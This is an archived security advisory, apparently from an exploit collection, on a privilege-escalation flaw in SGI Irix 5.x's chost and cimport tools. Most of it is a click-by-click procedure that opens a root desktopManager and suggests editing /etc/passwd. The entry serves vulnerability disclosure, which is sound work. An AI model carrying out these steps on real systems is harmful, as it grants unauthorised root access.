20 lines
No EOL
678 B
Text
20 lines
No EOL
678 B
Text
source: https://www.securityfocus.com/bid/335/info
|
|
|
|
A vulnerability exists in the chost and cimport programs, as shipped with SGI's Irix 5.x operating system. chost is part of the Cadmin package. By failing to validate the real userid, these programs allow any user to edit protected files, such as the passwd file.
|
|
|
|
/usr/Cadmin/bin/chost
|
|
tools-primary user information
|
|
change information
|
|
OK (to root password, ie leave blank)
|
|
OK (to "password invalid")
|
|
Cancel
|
|
Double-click any share resource to bring up desktopManager
|
|
running as root. Try editing /etc/passwd
|
|
|
|
|
|
/usr/Cadmin/bin/cimport
|
|
New
|
|
OK
|
|
OK
|
|
Cancel
|
|
double-click any of the mounted filesystems to bring up the desktopManager |